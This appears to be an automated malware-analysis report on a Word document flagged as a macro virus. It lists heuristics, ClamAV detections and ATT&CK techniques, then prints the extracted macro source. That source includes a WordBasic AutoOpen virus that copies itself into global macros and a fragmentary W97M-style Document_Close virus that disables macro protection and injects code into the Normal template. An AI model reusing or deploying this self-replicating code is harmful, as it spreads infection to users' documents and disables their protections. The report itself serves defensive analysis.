Verdict: MALICIOUS
Risk Score: 256

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macro markers and VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The critical heuristic for VBA macro-virus self-replication suggests the macro attempts to spread or tamper with the VBA project. ClamAV detections further confirm its malicious nature. The macro displays a fake input box, likely as a distraction or to gather user input, and its self-replication capability points towards a malicious document designed to spread.
Heuristics (6)

- ClamAV: Doc.Trojan.Twno-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Twno-1.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `tf.CodeModule.InsertLines i, a`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Name = "AutoOpen"`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `WordBasic.MacroCopy filem$, "AutoClose"`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6758 bytes | 61e0fad93e141c68ee742bf3e4fcca9e40304700e8663152f8bc7aa104929105 | ClamAV: Doc.Trojan.Twno-3; obfuscation or payload: unlikely |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Dim nm__()
Public Sub MAIN()
ReDim nm__(4)
Dim test
Dim con
Dim tog$
Dim i
Dim ans$
Dim j
Dim nor
Dim kk
Dim t
Dim file$
Dim filem$
Dim nor1
Dim kkk
Dim tt
WordBasic.DisableInput 1
If WordBasic.Day(WordBasic.Now()) = 97 Then
try:
On Error GoTo -1: On Error GoTo 0
On Error GoTo -1: On Error GoTo try
test = -1
con = 1
tog$ = ""
i = 0
While test = -1
For i = 0 To 4
nm__(i) = WordBasic.Int(Rnd() * 10000)
con = (con * nm__(i))
If i = 4 Then
tog$ = tog$ + Str(nm__(4)) + " =?"
GoTo beg
End If
tog$ = tog$ + Str(nm__(i)) + " *"
Next i
beg:
WordBasic.Beep
ans$ = WordBasic.[InputBox$]("¤µ¤Ñ¬O " + WordBasic.[Date$]() + " ,¸ò§Aª±¤@Ӥߺâ¹CÀ¸" + Chr(13) + _
"Y§Aµª¿ù,¥u¦n±µ¨ü¾_¾Ù±Ð¨|.............." + Chr(13) + _
tog$, "¥xÆW NO.1 Macro Virus")
If WordBasic.[RTrim$](WordBasic.[LTrim$](ans$)) = WordBasic.[LTrim$](Str(con)) Then
WordBasic.MsgBox "®¥¶P§Aµª¹ï¤F,«ö½T©w´N§i¶D§A·Qª¾¹Dªº....", _
"¥xÆW NO.1 Macro Virus"
WordBasic.FileNewDefault
WordBasic.CenterPara
WordBasic.FormatFont Font:="²Ó©úÅé", Points:=16, Bold:=1, Underline:=1
WordBasic.Beep
WordBasic.Insert "¦ó¿×¥¨¶°¯f¬r¡H"
WordBasic.InsertPara
WordBasic.Beep
WordBasic.Insert "µª®×:"
WordBasic.Italic 1
WordBasic.Insert "§Ú´N¬O....."
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.Italic 0
WordBasic.FormatFont Font:="²Ó©úÅé", Points:=16, Bold:=1, Underline:=1
WordBasic.Beep
WordBasic.Insert "¦p¦ó¹w¨¾¥¨¶°¯f¬r¡H"
WordBasic.InsertPara
WordBasic.Beep
WordBasic.Insert "µª®×:"
WordBasic.Italic 1
WordBasic.Insert "¤£n¬Ý§Ú....."
GoTo exit_
Else
For j = 1 To 20
WordBasic.Beep
WordBasic.FileNewDefault
Next j
WordBasic.CenterPara
WordBasic.FormatFont Font:="²Ó©úÅé", Points:=16, Bold:=1, Underline:=1
WordBasic.Insert "¥¨¶°¯f¬r"
GoTo try
End If
Wend
End If
nor = WordBasic.CountMacros(0)
If nor > 0 Then
For kk = 1 To nor
If WordBasic.[MacroName$](kk, 0) = "AutoOpen" Then
t = 1
End If
Next kk
End If
file$ = WordBasic.[FileName$]()
filem$ = file$ + ":AutoOpen"
If t <> 1 Then
WordBasic.MacroCopy filem$, "AutoOpen"
WordBasic.MacroCopy filem$, "AutoNew"
WordBasic.MacroCopy filem$, "AutoClose"
End If
nor1 = WordBasic.CountMacros(1)
If nor1 > 0 Then
For kkk = 1 To nor1
If WordBasic.[MacroName$](kkk, 1) = "AutoOpen" Then
tt = 1
End If
Next kkk
End If
If tt <> 1 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "AutoOpen", filem$
End If
exit_:
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' Open Letter to the Virus Hunters
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' This virus was written to help educate the
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' millennium bug. Please do not update your
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' until after December 1, 1999.
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' I know you won't do that, but what the heck.
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' I tried.
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' Bye!
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
On Error Resume Next
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
s = ActiveDocument.Saved
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Application.EnableCancelKey = Not -1
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Randomize
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If Dir("c:\sys00.bak", 6) = "" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Print #1, a
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Close #1
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
End If
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Else
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
End If
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If tf <> "" Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If LOF(1) = 0 Then GoTo q
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Do While Not EOF(1)
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
tf.CodeModule.InsertLines i, a
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Loop
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
Close #1
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
hh = Hour(Now): mm = Minute(Now): ss = Second(Now)
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
' only display messages for 1999
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
GoTo end_here
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
If hh > 12 Then
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
End If
'Ditry PC11/1/99 10:26:35 PMsample1.docClippit
t$ = Chr(13) + Chr(13)
'april 1, 1999
If dd = 1 And mm = 4 Then